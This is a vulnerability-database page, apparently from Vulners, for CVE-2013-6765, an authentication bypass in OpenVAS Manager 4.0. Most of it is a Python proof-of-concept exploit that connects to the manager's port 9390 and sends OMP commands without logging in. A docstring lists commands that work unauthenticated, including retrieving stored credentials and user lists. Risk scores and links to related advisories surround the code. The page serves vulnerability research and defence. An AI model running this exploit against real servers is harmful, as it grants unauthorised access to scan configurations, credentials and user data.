Vulners
Lucene search
OpenVAS Manager 4.0 - Authentication Bypass
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC | 21 Jul 201400:00 | – | zdt |
 | CVE-2013-6765 | 19 May 201414:00 | – | cve |
 | CVE-2013-6765 | 19 May 201414:00 | – | cvelist |
 | EUVD-2013-6567 | 7 Oct 202500:30 | – | euvd |
 | OpenVAS Manager 4.0 - Authentication Bypass | 10 Jul 201400:00 | – | exploitpack |
 | CVE-2013-6765 | 19 May 201414:55 | – | nvd |
 | OpenVAS Manager Authentication Bypass Vulnerability (OVSA20131108) | 8 Nov 201300:00 | – | openvas |
| GSM Manager Authentication Bypass | 8 Nov 201300:00 | – | openvas |
 | OpenVAS Administrator / Manager Authentication Bypass | 15 Nov 201300:00 | – | nessus |
 | Design/Logic Flaw | 19 May 201414:55 | – | prion |
10
#!/usr/bin/python
# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC
# Date: 09/07/2014
# Exploit Author: EccE
# Vendor Homepage: http://www.openvas.org/
# Software Link: http://wald.intevation.org/frs/?group_id=29
# Version: OpenVAS Manager 4.0
# Tested on: Debian GNU/Linux testing (jessie)
# CVE : CVE-2013-6765
"""
Small list of working commands
get_agents
get_configs
get_alerts
get_filters
get_lsc_credentials
get_notes
get_nvts
get_targets
get_users
get_schedules
More commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though.
As designed in OMP protocol, commands must be sent this way : <COMMAND/>
"""
import socket, ssl
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Require a certificate from the server. We used a self-signed certificate
# so here cacerts.pem must be the server certificate itself.
ssl_sock = ssl.wrap_socket(s,
ca_certs="/var/lib/openvas/CA/cacert.pem",
cert_reqs=ssl.CERT_REQUIRED)
# OpenVAS Manager listen by default on localhost tcp/9390
ssl_sock.connect(('localhost', 9390))
print "#################################################################"
print "# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #"
print "#################################################################"
print "\n"
print "--> Retrieving version...(exploiting the bug !)\n"
ssl_sock.write("<get_version/>")
data = ssl_sock.read()
print data
print "\n"
print "--> Retrieving slaves...\n"
ssl_sock.write("<get_slaves/>")
tasks = ssl_sock.read()
print tasks
print "\n"
"""
print "--> Creating note...\n"
ssl_sock.write("<create_note/>")
note = ssl_sock.read()
print note
print "--> Retrieving users list...\n"
ssl_sock.write("<get_users/>")
users_list = ssl_sock.read()
print users_list
"""
ssl_sock.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Jul 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 27.5
EPSS0.04543